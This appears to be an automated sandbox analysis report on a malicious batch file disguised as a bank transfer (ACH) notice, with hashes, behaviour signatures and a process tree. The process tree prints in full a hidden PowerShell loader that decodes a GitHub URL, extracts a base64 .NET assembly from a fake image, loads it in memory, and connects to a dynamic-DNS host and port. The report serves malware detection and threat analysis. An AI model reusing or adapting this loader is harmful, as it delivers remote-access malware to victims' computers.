Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    30/10/2024, 02:27

General

  • Target

    CONCEPTO DE TRANSACCIÓN REALIZADA ACH.bat

  • Size

    210KB

  • MD5

    fc162f6d374e3bce9c3130fdcb6b7307

  • SHA1

    a874953f738df2b9c59d52d1262aac387bf26fb7

  • SHA256

    c7b24736650ed6130939821101f4641e1a50a2316f3bbcf974d85c8de585a40d

  • SHA512

    520bf9202494786604d194bf6b23020231810744bbb405c1177ab7ee30c82633027445c3bb4e464cc690e7d7d0b6daaecd0a5884aeebcd585541d746cdf662e8

  • SSDEEP

    6144:vZnip76K90FB+Z7VIuArKAgY2aaOOiuauK+yp8:E

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true

exe.dropper

https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\CONCEPTO DE TRANSACCIÓN REALIZADA ACH.bat"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly9naXRodWIuY29tL0NyeXB0ZXJzQW5kVG9vbHMvVXBsb2FkL2Jsb2IvbWFpbi9uZXdfaW1hZ2UuanBnP3Jhdz10cnVl'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('joseamayaaa.chickenkiller.com', '1996');"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2364

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2364-6-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

          Filesize

          4KB

        • memory/2364-7-0x000000001B760000-0x000000001BA42000-memory.dmp

          Filesize

          2.9MB

        • memory/2364-9-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

          Filesize

          9.6MB

        • memory/2364-8-0x0000000002960000-0x0000000002968000-memory.dmp

          Filesize

          32KB

        • memory/2364-10-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

          Filesize

          9.6MB

        • memory/2364-11-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

          Filesize

          9.6MB

        • memory/2364-12-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

          Filesize

          9.6MB

        • memory/2364-13-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

          Filesize

          9.6MB

        • memory/2364-14-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

          Filesize

          9.6MB